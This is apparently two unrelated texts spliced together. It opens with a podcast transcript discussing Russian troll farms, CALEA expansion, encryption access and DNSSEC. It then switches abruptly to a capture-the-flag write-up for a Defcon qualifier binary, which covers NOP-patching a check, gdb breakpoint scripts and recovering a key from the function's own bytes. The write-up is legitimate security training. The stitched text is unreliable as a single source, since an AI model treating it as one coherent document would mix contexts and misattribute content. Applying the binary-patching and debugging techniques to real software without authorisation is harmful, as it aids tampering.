Stewart: Exactly; exactly. Okay, last topic – Putin’s trolls – I thought this was fascinating. This is where the New York Times really distinguished itself with this article, because it told us something we didn’t know and shed light on something kind of astonishing. This is the Internet Research Agency, I think: their army of trolls – and the Chinese have an even larger army of trolls – and essentially Putin’s FSB has figured out that if you don’t want to have a Facebook revolution or a Twitter revolution, you need to have people on Twitter and on Facebook 24 hours a day, posting comments and turning what would otherwise be evidence of dissent into a toxic waste dump, with people trashing each other, going off in weird directions, saying stupid things to the point where no one wants to read the comments anymore.

It’s now a policy. They’ve got a whole bunch of people doing it, and on top of it they’ve decided, “Hell, if the US is going to export Twitter and Twitter revolutions, then we’ll export trolling,” to the point where they’ve started making up chemical spills and tweeting them with realistic video, with people weighing in to say, “Oh yeah, I can see it from my house, look at those flames.” All completely made up, and done as though it were happening in Louisiana.

Dan: The reality is that for a long time the conversation was managed. We had broadcasts, broadcasters had direct government links, everything was filtered, and the big experiment of the internet was: what if we just remove those filters? What if we just let people manage it themselves? And astroturfing did not start with Russia; there’s been astroturfing for years. It’s where you have these people making fake events and controlling the message. What is changing is the scale of it. What is changing is who is doing it. What is changing is the organization and the amount of investment. You have people who are professionally operating to reduce the credibility of Twitter and of Facebook so that, quote/unquote, the only thing you can trust is the broadcast.

Stewart: I think that’s exactly right. I think they call the Chinese version of this the 50 Cent Army, because they get 50 cents a post. But I guess I am surprised that the Russians would do that to us in what is plainly an effort to test whether they could totally disrupt our emergency response. It didn’t do much in Louisiana, but it wouldn’t be hard, in a more serious crisis, for them to create panic, doubt and uncertainty about the reliability of a whole bunch of media in the United States.

This was clearly a dry run, and our response to it was pretty much nothing. I would have thought that the US government would say, “No, you don’t create fake emergencies inside the United States by pretending to be US news media.”

Jason: I was going to say, all those alien sightings in Roswell over the last 50 years – do you think they were Russia or China?

Stewart: Well, they were pre-Twitter; I’m guessing not, but from now on I think we can assume they are.

Dan: What it all comes back to is the crisis of legitimacy. People do not trust the institutions that are around them. If you look, there’s too much manipulation, too much spin, too many lies. And as it happens, institutions are not all bad. Like, you know what? Vaccines are awesome. But because we have this lack of legitimacy, people are looking to find the thing they’re supposed to be paying attention to, because the normal stuff keeps turning out to have been a lie. And really, you know what, what Russia’s doing here is just saying, “We’re going to find the things that you’re turning to instead, the ones you think aren’t lying; we’re going to lie there too, because what we really want is for America to stop airing our dirty laundry through this Twitter thing, and if America is not going to regulate Twitter, we’re just going to go ahead and make a mess of it too.”

Stewart: Yeah. I think their view is, “Well, Twitter undermines our legitimacy; why can’t we use it to undermine yours?”

Dan: Yeah, Russians screwing with Americans; more likely than you think.

Michael: I’m surprised you guys see it as an effort to undermine Twitter; this strikes me as classic KGB disinformation tactics, and it seems to me they’re using a new medium and, as you said before, doing dry runs so that when they actually have a need to engage in information operations against the US or against Ukraine or against some other country, they’ll know how to do it. They’ll have practiced corps of trolls who know how to do this stuff in today’s media. I don’t think they’re trying to undermine Twitter.

Stewart: One of the things that’s interesting is that the authoritarians have figured out how to manage their people using electronic tools. They were scared to death by all of this stuff ten years ago, and they’ve responded very creatively and very effectively, to the point where I think they can maintain an authoritarian regime for a long time, without totalitarianism but still very effectively. And now they’re in the process of saying, “Well, how can we use these tools as a weapon, the way they perceive the US to have used them as a weapon in the first ten years of social media?” We need a response, because they’re not going to stop doing it until we have a response.

Michael: I’d start with the violation of the missile treaty before worrying about this so much.

Stewart: Okay, so maybe this is of a piece with the Administration’s strategy for negotiating with Russia, which is to hope that the Russians will come around. The Supreme Court had a ruling in the case we talked about a while ago; this is the guy who wrote really vile and threatening and scary things about his ex-wife and the FBI agent who came to interview him, and who said afterwards, after he’d posted on Facebook and been arrested for it, “Well, come on, I was just doing what everybody in hip hop does; you shouldn’t take it seriously. I didn’t.” The Supreme Court was asked to decide whether the test for a threat is the understanding of the writer or the understanding of the reader. At least that’s how I read it, and they sided with the writer, with the guy who wrote all those vile things. Michael, did you look more closely at that than I did?

Michael: The court read into it a requirement that the government has to show at least that the defendant sent the communication with the purpose of issuing a threat or with the knowledge that it would be viewed as a threat, and it wasn’t enough for the government to argue and a jury to find that a reasonable person would perceive it as a threat.

So you have to show at least knowledge or purpose or intent, and it left open the question whether recklessness as to how it would be perceived, was enough.

Stewart: All right; well, I’m not sure I’m completely persuaded, but it probably also doesn’t have enough to do with cyberlaw in the end to pursue. Let’s close up with one last topic, which is that the FBI is asking for, or talking about, expanding CALEA to cover social media, to cover communications that go out through direct messaging and the like, saying: it’s not that we haven’t gotten cooperation from social media when we wanted it for a wiretap; it’s just that in many cases they haven’t been able to do it quickly enough, and we need to set some rules in advance for their ability to do wiretaps.

This is different from the claim that they’re Going Dark and that they need access to encrypted communications; it really is an effort to actually change CALEA, the Communications Assistance for Law Enforcement Act of 1994, which imposed that obligation on phone companies and then later on voice-over-IP providers. Jason, what are the prospects for this? How serious a push is this?


Jason: Well, the prospects are – it’s DOA – but just to put it in a little bit of historical perspective: Going Dark has of late been the name for the FBI’s effort to deal with encryption, but the original use of that term, at least in 2008/2009 when the FBI started a legislative push to amend CALEA and extend it to internet-based communications, was for that effort. They would routinely cite the fact that there was a very significant number of wiretaps, in both criminal and national security cases, that providers not covered by CALEA didn’t have the technical capability to implement.

So it wasn’t about law enforcement having the authority to conduct a wiretap; they by definition had already developed enough evidence to satisfy a court that they could meet the legal standard. It was about the provider’s ability to help them execute that authority they already had. As you suggested, either the wiretap couldn’t be done at all, or the provider and the government would have to work together to develop a technical solution, which could take months and months, by which time the target wasn’t using that method of communication anymore; he’d moved on to something else.

So for the better part of four years, my last four years at the department, the FBI was pushing, along with DEA and some other agencies, for a massive CALEA reform effort to expand it to internet-based communications. At that time – this is pre-Snowden; it’s certainly truer now – it was viewed as a political non-starter to try to convince providers that CALEA should be expanded.

So they downshifted, as a Plan B, to trying to amend Title 18 – and I think there were some parallel amendments to Title 50 – but the Title 18 amendments would have dramatically increased the penalties for a provider that didn’t have the capability to implement a valid wiretap order that law enforcement served.

There would be this graduated series of penalties that would essentially create a significant financial disincentive for a provider not to have an intercept capability in advance, or at least to be able to develop one quite quickly. So the FBI, although it wanted CALEA to be expanded, was willing to settle for this sort of indirect way to achieve the same thing: to incentivize providers to develop intercept solutions.

That was an unlikely bill to make it to the Hill, and to make it through the Hill, before Snowden; after Snowden I think it became political plutonium. It was very hard, even before Snowden, to explain to people that this was not an effort to expand authorities; it was about executing those authorities. That argument became almost impossible to make in the post-Snowden world.

What struck me about this story, though, is that they appear to be going back to Plan A, which is trying to go in the front door and expand CALEA, and the only way I can interpret it is that either the people running this effort now are unaware of the previous history, or they’ve just decided, what the hell, they have nothing to lose. They’re unlikely to get it through anyway, so they might as well ask for what they want.

Stewart: That’s my impression. There isn’t any likelihood in the next two years that encryption is going to get regulated, but the Justice Department and the FBI are raising this issue I think partly on what the hell, this is what we want, this is what we need, we might as well say so, and partly I think preparation of the battle space for the time when they actually have a really serious crime that everybody wishes had been solved and can’t be solved because of some of these technical gaps.

Dan: You know what drives me nuts? We’re getting hacked left and right; we’re leaking data left and right; and all these guys can talk about is how they want to leak more data. Like what we just heard here about encryption: “We’re not saying we’re banning encryption, but if there’s encryption and we can’t get through it, we’re going to have a graduated series of costs, or we’re going to pull CALEA into this.” There are entire classes of software we need to protect American business that are very difficult to invest in right now. It’s very difficult to know, in the long term, that you’re going to get to run it.

Stewart: Well, actually my impression is that VCs are falling all over themselves to fund people who say, “Yeah, we’re going to stick it to the NSA.”

Dan: Yeah, but those of us who actually know what we’re doing know that whatever we’re doing, whatever would actually work, is actually under threat. There are lots of scammers out there; oh my goodness, there is some great, amazing, 1990s-era snake oil going on, but the smart money is not too sure we’re going to get away with securing anything.

Stewart: I think that’s probably right; why don’t we just move right in, because I had promised I was going to carry this over from the news roundup to this question – Julian Sanchez raised it; I raised it with Julian at a previous podcast. We were talking about the effort to get access to encrypted communications, and I mocked the people who said, “Oh, you can never provide access without creating a security risk; that’s always a bad idea.” And I said, “No, come on.” Yes, it creates a security risk and you have to manage it, but sometimes the security risk and the cost of managing it is worth it because of the social values.

Dan: Sometimes you lose 30 years of background check data.

Stewart: Yeah, although I’m not sure they would have. I’m not sure how encryption, especially encryption of data in motion, would have changed that.

Dan: It’s a question of can you protect the big magic key that gives you access to everything on the Internet, and the answer is no.

Stewart: So let me point to the topic that Julian didn’t want to get into, because it seemed to be more technical than he was comfortable with, which is –

Dan: Bring it on.

Stewart: Exactly. I said, “Are you kidding me? End to end encryption?” The only end to end encryption that has been adopted universally on the internet since encryption became widely exportable is SSL/TLS. That’s everywhere; it’s the default.

Okay, but SSL/TLS is broken every single day by the thousands, if not the millions, and it’s broken by respectable companies. In fact, probably every Fortune 500 company insists that SSL has to be broken at their firewall.

And they do it; they do it so that they can inspect the traffic to see whether some hacker is exfiltrating the –

Dan: Yeah, but they’re inspecting their own traffic. Organizations can go ahead and balance their benefits and balance their risks. When it’s an external actor it’s someone else’s risk. It’s all about externality.

Stewart: Well, yes, okay; I grant you that. The point is, the idea that building in access is always a stupid idea, never worth it, is just wrong; or at least it’s inconsistent with the security practices that we have today. And probably, if anything, some of the things that companies like Google and Facebook are doing to promote SSL are going to result in more exfiltration of data. People are already exfiltrating data through Google properties, because Google insists that they be whitelisted from these intercepts.

Dan: What’s increasingly happening is that corporations are moving the intercept and DLP and analytics role to the endpoint because operating it as a midpoint just gets slower and more fragile day after day, month after month, year after year. If you want security, look, it’s your property, you’re a large company, you own 30,000 desktops, they’re your desktops, and you can put stuff on them.

Stewart: But the companies have that problem – weighing the importance of end-to-end encryption for security against the importance of being able to monitor activity for security – and they have come down and said, “We have to be able to monitor it; we can’t just assume that every one of our users is operating safely.” That’s a judgment that society can make just as easily. Once you’ve had the debate, society can say, “You know, on the whole, weighing the privacy of everybody in our country against the risks of criminals misusing that data, we’re prepared to take some risk on the security side – to have less effective end-to-end encryption – in order to make sure that people cannot get away with breaking the law with impunity.”

Dan: Here’s a thing though – society has straight out said, “We don’t want bulk surveillance.” If you want to go ahead and monitor individuals, you have a reason to monitor, that’s one thing but –

Stewart: But you can’t monitor all of them. If they’ve been given end to end – I agree with you – there’s a debate; I’m happy to continue debating it but I’ve lost so far. But you say, no, it’s this guy; this guy, we want to listen to his communications, we want to see what he is saying on that encrypted tunnel, you can’t break that just stepping into the middle of it unless you already own his machine.

Dan: Yeah, and it’s unfortunately the expensive road.

Stewart: because they don’t do no good.

Dan: isn’t there. It isn’t the actual thing.

Stewart: It isn’t here – I’m over at Stanford and we’re at the epicenter of a contempt for government, but everybody gets a vote. You get a vote if you live in Akron, Ohio too, but nobody in Akron gets a vote about where their end to end encryption is going to be deployed.

Dan: You know, look, average people, normal people have like eight secure messengers on their phone. Text messaging has fallen off a cliff; why? At the end of the day it’s because people want to be able to talk to each other and not have everyone spying on them. There’s a cost, there’s an actual cost to spying on the wrong people.

Stewart: There is?

Dan: If you go ahead and you make everyone your enemy you find yourself with very few friends. That’s how the world actually works.

Stewart: All right; I think we’ve at least agreed that there’s routine breakage of the one end to end encryption methodology that has been widely deployed. I agree with you, people are moving away from man in middle and are looking to find ways to break into systems at the endpoint or close to the endpoint. Okay; let’s talk a little bit, if we can, about DNSSEC because we had a great fight over SOPA and DNSSEC, and I guess the question for me is what – well, maybe you can give us two seconds or two minutes on what DNSSEC is and how it’s doing in terms of deployment.

Dan: DNSSEC, at the end of the day, makes it as easy to get encryption keys as it is to get the address for a server. Crypto should not be drama. You’re a developer, you need to figure out how to encrypt something: hit the encrypt button and move on with your life. You write your app. That’s how it needs to work.

DNS has been a fantastic success at providing addressing to the internet. It would be nice if keying were just as easy, but let me tell you, how do you go out and talk to all these internet people about how great DNSSEC is when really it’s very clear DNS itself [is politically contested]? It’s not like the SOPA fights aren’t going to come back –

Stewart: Yeah; well, maybe.

Dan: – and it’s not like the security establishment, which should be trying to make America safer, it’s like, “Man, we really want to make sure we get our keys in there.” When that happens [it doesn’t work]. It’s not that DNSSEC isn’t a great technology, but it really depends on politically [the DNS and its contents] being sacrosanct.

Stewart: Obviously, DHS and the OMB committed to getting DNSSEC deployed at the federal level, and so their enthusiasm for DNSSEC has been substantial. Are you saying that they have undermined that in some way that –

Dan: The federal government is not monolithic; two million employees, maybe more, and what I’m telling you is that the security establishment keeps on saying, “Hey, we’ve got to be able to get our keys in there too” – we’ve got this dual-mission problem going on here. Any system with a dual mission – no one actually believes there’s a dual mission, okay.

If the Department of Transportation was like, “Maybe cars should crash from time to time,” or if Health and Human Services was like, “Hey, you know, polio is kind of cool for killing some bad guys,” no one would take those vaccines, because maybe it’s the other mission at work. That’s kind of the situation that we have right here. Yeah, DNSSEC is a fantastic technology for key distribution, but we have no idea what you’re going to do with it five years from now, and so instead it’s being replaced with garbage. [EDIT: This is rude, and inappropriate verbiage.]

I’m sorry, I know people are doing some very good work, but let me tell you, their value add is it’s a bunch of centralized systems that all say, “But we’re going to stand up to the government.” I mean, that’s the value add and it never scales, it never works but we keep trying because we’ve got to do something because it’s a disaster out there. And honestly, anything is better than what we’ve got, but what we should be doing is DNSSEC and as long as you keep making this noise we can’t do it.

Stewart: So DNSSEC is up to what? Ten percent deployment?

Dan: DNSSEC needs a round of investment that makes it a turnkey switch.

Stewart: Aah!

Dan: DNSSEC could be done [automatically] but every server just doesn’t. We [could] just transition the internet to it. You could do that. The technology is there but the politics are completely broken.

Stewart: Okay; last set of questions. You’re the Chief Scientist at WhiteOps, and let me tell you what I think WhiteOps does, and then you can tell me what it really does. I think of WhiteOps as having made the observation that the hackers who are getting into our systems are doing it from a distance. They’re sending bots in to pack up and exfiltrate data. They’re logging on, and bots look different from human beings when they type stuff, and the people who are trying to manage an intrusion remotely also look different from somebody who is actually on the network. What WhiteOps is doing is saying, “We can find those guys and stop them.”

Dan: And it’s exactly what we’re doing. Look, I don’t care how clever your buffer overflow is; you’re not teleporting in front of a keyboard, okay. That’s not going to happen. So our observation is that we have this very strong signal, it’s not perfect because sometimes people VPN in, sometimes people make scripted processes.

Stewart: But they can’t keep a VPN up for very long?

Dan: [If somebody is remotely] on the machine, you can pick it up in JavaScript. A website that’s being lilypad-accessed – either through bulk communications with command and control to a bot, or through interaction with remote control – churns out weak signals that we’re able to pick up in JavaScript.

Stewart: So this sounds so sensible and so obvious that I guess my question is how come we took this long to have that observation become a company?

Dan: I don’t know but we built it. The reality is, is that it requires knowledge of a lot of really interesting browser internals. At WhiteOps we’ve been breaking browsers for years so we’re basically taking all these bugs that actually never let you attack the user but they have completely different responses inside of a bot environment. That’s kind of the secret sauce.

Every browser is really a core object that parses HTML5, JavaScript, video – all the things you’ve got to do to be a web browser. Then there’s like this goop, right? It puts things on the screen, it has a back button, it has an address bar, it lets you configure stuff. It turns out that the bots use the core, not the goop.

Stewart: Oh yeah, because the core enables them to write one script for everything?

Dan: Yeah, so you have to think of bots as really terribly tested browsers and once you realize that it’s like, “Oh, this is barely tested, let’s make it break.”

Stewart: Huh! I know you’ve been doing work with companies looking for intrusions. You’ve also been working with advertisers; not trying to find people who are basically engaged in click fraud. Any stories you can tell about catching people on well guarded networks?

Dan: I think one story I really enjoy – we actually ran the largest study of its nature into ad fraud that had ever been done. We found that there’s going to be about $6 billion of ad fraud (the report is at http://whiteops.com/botfraud). And we had this one case. We told the world we were going to go ahead and run this test in August and find all the fraud. You know what? We lied. We do that sometimes.

We actually ran a test from a little bit in July all the way through September, and we watched this one campaign: 40 percent fraud; then, when we said we were going to start, three percent fraud; then, when we said we were going to stop, back to 40. You just had this square wave. It was the most beautiful demo. We showed this to the customer – one of the biggest brands in the country – and they were just like, “Those guys did what?”

And here’s what’s great – for my entire career I’ve been dealing with how people break in. This bug, that bug, what’s wrong with Flash, what’s wrong with Java? This is the first time in my life I have ever been dealing with why. People are doing this fraud to make money. Let’s stop the checks from being written? It’s been incredibly entertaining.

Stewart: Oh, that it is; that’s very cool, and it is – I guess maybe this is the observation. We wasted so much time trying to keep people out of systems hopelessly; now everybody says, “Oh, you have to assume they’re in,” but that doesn’t mean you have the tools to really deal with them, and this is a tool to deal with people when they’re in.

Dan: There’s been a major shift from prevention to detection. We basically say, “Look, okay, they’re going to get in but they don’t necessarily know what perfectly to do once they’re in.” Their actions are fundamentally different than your legitimate users and they’re always going to be because they’re trying to do different things; so if you can detect properties of the different things that they’re doing you actually have signals, and it always comes down to signals in intelligence.

Stewart: Yeah; that’s right. I’m looking forward to NSA deploying WhiteOps technology, but I won’t ask you to respond to that one. Okay, Dan, this was terrific I have to say. I’d rather be on your side of an argument than against you, but it’s been a real pleasure arguing this out. Thanks for coming in Michael, Jason; I appreciate it.

Just to close up, the CyberLaw Podcast is open to feedback. Send comments to cyberlawpodcast@steptoe.com or leave a message at 202 862 5785. I’m still waiting for an entertainingly abusive voicemail; we haven’t gotten one yet. This has been episode 70 of the Steptoe CyberLaw Podcast, brought to you by Steptoe & Johnson. Next week we’re going to be joined by Catherine Lotrionte, who is the Associate Director of the Institute for Law, Science and Global Security at Georgetown. And coming soon we’re going to have Jim Baker, the General Counsel of the FBI, and Rob Knake, a Senior Fellow for Cyber Policy at the Council on Foreign Relations. We hope you’ll join us next week as we once again provide insights into the latest events in technology, security, privacy, and government.

Defcon quals: wwtw (a series of vulns)

Hey folks,

This is going to be my final (and somewhat late) writeup for the Defcon Qualification CTF. The level was called "wibbly-wobbly-timey-wimey", or "wwtw", and was a combination of a few things (at least the way I solved it): programming, reverse engineering, logic bugs, format-string vulnerabilities, some return-oriented programming (for my solution), and Dr. Who references!

I'm not going to spend much time on the theory of format-string vulnerabilities or return-oriented programming because I just covered them in babyecho and r0pbaby.

And by the way, I'll be building the solution in Python as we go, because the first part was solved by one of my teammates, and he's a Python guy. As much as I hated working with Python (which has become my life lately), I didn't want to re-write the first part and it was too complex to do on the shell, so I sucked it up and used his code.

You can download the binary here, and you can get the exploit and other files involved on my github page.

Part 1: The game

The first part's a bit of a game. I wasn't all that interested in solving it, so I patched it out (see the next section) and discovered that there was another challenge I could work on while my teammate solved the game. This is going to be a very brief overview of my teammate's solution.

When you start wwtw, you will see this:

You(^V<>) must find your way to the TARDIS(T) by avoiding the angels(A).
Go through the exits(E) to get to the next room and continue your search.
But, most importantly, don't blink!
   012345678901234567890
00        <
01
02  A
03
04            A
05
06                AA
07    A        A
08 A
09
10  A     A
11                  A
12                 A
13
14                    A
15    A
16 A   A              E
17
18                A
19  A
Your move (w,a,s,d,q):

After a few seconds, it times out. The timeout can be patched out, if you want, but the timeouts are actually somewhat important in this level as we'll see later.

You can move around your character using the w,a,s,d keys, as indicated in the little message. Your goal is to reach the tardis - represented by a 'T' - by going through the exits - represented by 'E's - and avoiding the angels - represented by 'A's. The angels will follow you when your back is turned. This stuff is, of course, a Dr. Who reference. :)

The solution to this was actually pretty straightforward: a greedy algorithm that makes the "best" move toward the exit to a square that isn't occupied by an angel works 9 times out of 10, so we stuck with that and re-ran it whenever we got stuck in a corner or along the wall.

You can see the code for it in the exploit. I'm not going to dwell on that part any longer.
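That said, for illustration, one greedy step might look something like this (a minimal sketch with my own names and grid representation, not my teammate's actual code; it assumes the grid is a list of strings and positions are (row, col) tuples):

def greedy_move(grid, me, exit_pos):
    moves = {"w": (-1, 0), "s": (1, 0), "a": (0, -1), "d": (0, 1)}
    best = None
    for key, (dr, dc) in moves.items():
        r, c = me[0] + dr, me[1] + dc
        if not (0 <= r < len(grid) and 0 <= c < len(grid[r])):
            continue  # off the board
        if grid[r][c] == "A":
            continue  # never step onto an angel
        dist = abs(exit_pos[0] - r) + abs(exit_pos[1] - c)
        if best is None or dist < best[0]:
            best = (dist, key)  # closest legal square to the exit wins
    return best[1] if best else "q"  # no safe move left: quit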

Part 1b: skipping the game

As I said, I didn't want to deal with solving the game, I wanted to get to the good stuff (so to speak), so I "fixed" the game such that every move would appear to be a move to the exit (it would be possible to skip the game part entirely, but this was easy and worked well enough).

This took a little bit of trial and error, but I primarily used the failure message - "Enjoy 1960..." - to figure out where in the binary to look.

If you look at all the places that string is found (in IDA, use shift-f12 or just search for it), you'll find one that looks like this:

.text:00002E14          lea     eax, (aEnjoy1960____0 - 5000h)[ebx] ; "Enjoy 1960..."

If you look back a little bit, you'll find that the only way to get to that line is for this conditional jump to occur:

.text:00002DC0 83 7D F4 01                             cmp     [ebp+var_C], 1
.text:00002DC4 75 48                                   jnz     short loc_2E0E

It's pretty easy to fix that: simply replace the jnz - 75 48 - with nops - 90 90. Here's a diff:

--- a   2015-06-03 17:09:22.000000000 -0700
+++ b   2015-06-03 17:09:44.000000000 -0700
@@ -3635,7 +3635,8 @@
     2db8:      e8 7f ed ff ff          call   1b3c <main+0x937>
     2dbd:      89 45 f4                mov    %eax,-0xc(%ebp)
     2dc0:      83 7d f4 01             cmpl   $0x1,-0xc(%ebp)
-    2dc4:      75 48                   jne    2e0e <main+0x1c09>
+    2dc4:      90                      nop
+    2dc5:      90                      nop
     2dc6:      8d 83 e0 00 00 00       lea    0xe0(%ebx),%eax
     2dcc:      8b 00                   mov    (%eax),%eax
     2dce:      83 f8 03                cmp    $0x3,%eax
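If you'd rather script the patch than hand-edit it, something like this works (a sketch; the filenames are mine, and it assumes the jne's file offset matches the 0x2dc4 address in the listing, which holds here since the .text addresses and file offsets line up):

with open("wwtw", "rb") as f:
    data = bytearray(f.read())
assert data[0x2dc4:0x2dc6] == b"\x75\x48"  # make sure we're really on the jne
data[0x2dc4:0x2dc6] = b"\x90\x90"          # nop; nop
with open("wwtw-patched", "wb") as f:
    f.write(data)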

Aside: Making the binary debug-able

Just as a quick aside: this program is a PIE - position independent executable - which means the addresses you see in IDA are all relative to 0. But when you run the program, it's assigned a "proper" address, even if ASLR is off. I don't know if there's a canonical way to deal with that, but I personally use this little trick in addition to turning off ASLR:

  1. Replace the first instruction in the start() or main() function with "\xcc" (a software breakpoint), padded with enough nop instructions to overwrite exactly one instruction
  2. Run it in a debugger such as gdb
  3. (Optionally) use a .gdbinit file that automatically resumes execution when the breakpoint is hit

Here's the first line of start() in wwtw:

.text:00000A60 31 ED                                   xor     ebp, ebp

Since it's a two-byte instruction ("\x31\xED"), we open the binary in a hex editor and replace those two bytes with "\xcc\x90" (the "\x90" being a nop instruction). If you did it right, you should see this when you try to execute it:

$ ./wwtw-blog
Trace/breakpoint trap

And with a debugger, you can continue execution after that breakpoint:

$ gdb -q ./wwtw-blog
(gdb) run
Starting program: /home/ron/defcon-quals/wwtw/wwtw-blog

Program received signal SIGTRAP, Trace/breakpoint trap.
0x56555a61 in ?? ()
(gdb) cont
Continuing.
You(^V<>) must find your way to the TARDIS(T) by avoiding the angels(A).
Go through the exits(E) to get to the next room and continue your search.
[...]

You can also use a gdbinit file:

$ echo -e 'run\ncont' > gdbhax
$ gdb -q -x ./gdbhax ./wwtw-blog
Program received signal SIGTRAP, Trace/breakpoint trap.
0x56555a61 in ?? ()
You(^V<>) must find your way to the TARDIS(T) by avoiding the angels(A).
Go through the exits(E) to get to the next room and continue your search.
But, most importantly, don't blink!
[...]

Part 2: Starting the ignition (by debugging)

After you complete the fifth room and get to the Tardis, you're prompted for a key:

TARDIS KEY: abcd
Wrong key!
Enjoy 1960...
$ bcd

Funny story: I had initially nop'd out the failure condition when I was trying to nop out the "you've been eaten by an angel" code from earlier, so it actually took me a while to even realize that this was a challenge. I had accidentally set it to - as I describe in the next section - accept any password. :)

Anyway, one thing you'll notice is that when it prompts you for the key, you can type in multiple characters, but after it kicks you out, it leaves all but the first character on the command line. That's interesting, because it means that it's only consuming one character at a time and is therefore vulnerable to a bunch of attacks. If you happen to guess a correct character, it consumes one more:

TARDIS KEY: Uabcd
Wrong key!
Enjoy 1960...
$ bcd

(Note that it consumed both the "U" and the "a" this time)

Because it's checking one character at a time, it's pretty easy to guess it one character at a time - 62 max tries per character (31 on average) and a 10-character string means it could be guessed in something like 600 - 1000 runs. But we can do better than that!
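For reference, here's what that naive attack looks like, simulated locally against a stand-in key (a sketch: the trailing sentinel character tells us whether our candidate was itself consumed as correct):

import string

SECRET = "0123456789"  # stand-in for the real key

def chars_consumed(guess):
    # model of the binary: it consumes characters up to and
    # including the first wrong one
    for i, g in enumerate(guess):
        if i >= len(SECRET) or g != SECRET[i]:
            return i + 1
    return len(guess)

key = ""
while len(key) < len(SECRET):
    for c in string.ascii_letters + string.digits:
        if chars_consumed(key + c + "!") == len(key) + 2:
            key += c  # the sentinel was consumed too, so c was correct
            break
print key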

I searched the binary in IDA for the string "TARDIS KEY:" to get an idea of where to look for the code. You will find it at 0x00000ED1, which is in a fairly short function called from main(). In it, you'll see a call to both read() and getchar(). But more importantly, in the whole function there's only one "cmp" instruction that takes two registers (as opposed to a register and an immediate value, i.e., a constant):

.text:00000F45 39 C2                                   cmp     edx, eax

If I had to take a wild guess, I'd say that this function somehow verifies the password you type in using that comparison. And if we're lucky, it'll be a comparison between what we typed and what they expected to see (it doesn't always work out that way, but when it does, it's awesome).

To set a breakpoint, we need to know which address to break at. The easiest way to do that is to disable ASLR and just have a look at what address stuff loads to. It shouldn't change if ASLR is off.

On my machine, wwtw loads to 0x56555000, which means that comparison should be at 0x56555000 + 0x00000f45 = 0x56555f45. We can verify in gdb:

(gdb) x/i 0x56555f45
   0x56555f45:  cmp    edx,eax

We want to put a breakpoint there and print out both of those values to make sure that one is what we typed and the other isn't. I added the breakpoint to my gdbhax file because I know I'm going to be using it over and over:

$ cat gdbhax
run
b *0x56555f45
cont

And run the process (punching in whatever you want for the five moves, since we've already "fixed" the game):

$ gdb -q -x ./gdbhax ./wwtw-blog
[...]
Program received signal SIGTRAP, Trace/breakpoint trap.
0x56555a61 in ?? ()
Breakpoint 1 at 0x56555f45
You(^V<>) must find your way to the TARDIS(T) by avoiding the angels(A).
Go through the exits(E) to get to the next room and continue your search.
But, most importantly, don't blink!

[...]

TARDIS KEY: a

Breakpoint 1, 0x56555f45 in ?? ()
(gdb)
(gdb) print/c $edx
$2 = 65 'a'
(gdb) print/c $eax
$3 = 85 'U'
(gdb)

It's comparing the first character we typed ("a") to another character ("U"). Awesome! Now we know that at that comparison, the proper character is in $eax, so we can add that to our gdbhax file:

$ cat gdbhax
run
b *0x56555f45

cont

while 1
  print/c $eax
  cont
end

That little script basically sets a breakpoint on the comparison, then each time it breaks it prints eax and continues execution.

When you run it a second time, we start with "U" and then whatever other character so we can get the second character:

$ gdb -q -x ./gdbhax ./wwtw-blog
[...]
TARDIS KEY: Ua

Breakpoint 1, 0x56555f45 in ?? ()
$1 = 85 'U'

Breakpoint 1, 0x56555f45 in ?? ()
$2 = 101 'e'
Wrong key!

Then run it again with "Ue" at the start:

Breakpoint 1, 0x56555f45 in ?? ()
$1 = 85 'U'

Breakpoint 1, 0x56555f45 in ?? ()
$2 = 101 'e'

Breakpoint 1, 0x56555f45 in ?? ()
$3 = 83 'S'

...and so on. Eventually, you'll get the key "UeSlhCAGEp". If you try it, you'll see it works:

TARDIS KEY: UeSlhCAGEp
Welcome to the TARDIS!
Your options are:
1. Turn on the console
2. Leave the TARDIS

Part 2b: Without brute force

Usually in CTFs, if a password or key is English-looking text, it's probably hardcoded, and if it's random looking, it's generated. Since that key was obviously not English, it stands to reason that it's probably generated and therefore would not work against the real service. At this point, my teammate hadn't solved the "game" part yet, so I couldn't easily test against the real server. Instead, I decided to dig a bit deeper to see how the key was actually generated. Spoiler: it doesn't actually change, so this wound up being unnecessary. There's a reason I take a long time to solve these levels. :)

At the start of the function that references the "TARDIS KEY:" string (the function contains, but doesn't start at, address 0x00000ED1), you'll see this line:

.text:00000EEF        lea     eax, (check_key - 5000h)[ebx]

Later, the data at that address is read, one byte at a time:

.text:00000EFA top_loop:                               ; CODE XREF: check_key+A4j
.text:00000EFA                 mov     eax, [ebp+key_thing]
.text:00000EFD                 movzx   eax, byte ptr [eax]
.text:00000F00                 movsx   eax, al
.text:00000F03                 and     eax, 7Fh
.text:00000F06                 mov     [esp], eax      ; int
.text:00000F09                 call    _isalnum

At each point, it reads the next byte, ANDs it with 0x7F (clearing the uppermost bit), and calls isalnum() on it to see if it's a letter or a number. If it's a valid letter or number, it's considered part of the key; if not, it's skipped.

It took me far too long to see what was going on: the function I called check_key() actually references itself and reads its own code! It reads the first dozen or so bytes of its own machine code and compares the alphanumeric values to the key that was typed in.

To put it another way: if you look at the start of the function in a hex editor, you'll see:

55 89 E5 53 83 EC 24 E8 DC FB FF FF 81 C3 3C 41...

If we AND each of these values by 0x7F and convert them to a character, we get:

1.9.3-p392 :004 > "55 89 E5 53 83 EC 24 E8 DC FB FF FF 81 C3 3C 41".split(" ").each do |i|
1.9.3-p392 :005 >     puts (i.to_i(16) & 0x7F).chr
1.9.3-p392 :006?>   end
U

e
S

l
$
h
\
{



C
<
A

If you exclude the values that aren't alphanumeric, you can see that the first 16 bytes become "UeSlhCA", which is the first part of the code to start the engine!
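The same derivation in Python, if Ruby isn't your thing:

code = "\x55\x89\xE5\x53\x83\xEC\x24\xE8\xDC\xFB\xFF\xFF\x81\xC3\x3C\x41"
key = "".join(c for c in (chr(ord(b) & 0x7F) for b in code) if c.isalnum())
print key  # UeSlhCA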

Satisfied that it wasn't random, I moved on.

Aside: Why did they use the function as the key?

Just a quick little note in case you're wondering why the function used itself to generate the password...

When you set a software breakpoint (which is by far the most common type of breakpoint), the debugger replaces the instruction behind the scenes with a software breakpoint instruction ("\xcc"). After it breaks, the real instruction is briefly put back so the program can continue.

If you break on the first line of the function, then instead of the first byte being "\x55" - "push ebp" - it's "\xCC", and therefore the derived value will be wrong. In fact, putting a breakpoint anywhere in the first ~20 bytes of that function will cause your passcode to be wrong.
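To make that concrete:

print chr(0x55 & 0x7F)  # 'U' - the first key character, derived from "push ebp"
print chr(0xCC & 0x7F)  # 'L' - with a breakpoint planted, 0xCC is still
                        # alphanumeric, so the key silently becomes "LeSlhCA..."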

